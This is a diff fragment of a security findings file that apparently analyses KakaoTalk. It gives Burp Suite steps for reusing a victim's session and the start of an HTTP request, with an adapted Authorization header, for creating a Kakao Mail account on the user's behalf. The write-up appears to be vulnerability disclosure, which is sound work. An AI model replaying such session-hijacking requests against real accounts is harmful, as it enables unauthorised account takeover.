stulle123/kakaotalk_analysis/FINDINGS.md

 4. Click on `Send` and confirm the target details
 5. Right-click in the request window, select `Request in browser > In original session` and copy the URL into Burp's browser.

-As pointed out above we can also create a new Kakao Mail account on the user's behalf.
+As pointed out above we could also create a new Kakao Mail account on the user's behalf.
 Just repeat the same steps with Burp using the following HTTP request (adapt the `Authorization` header):

 ```
 GET /kakao_mail/main?continue=https://talk.mail.kakao.com HTTP/1.1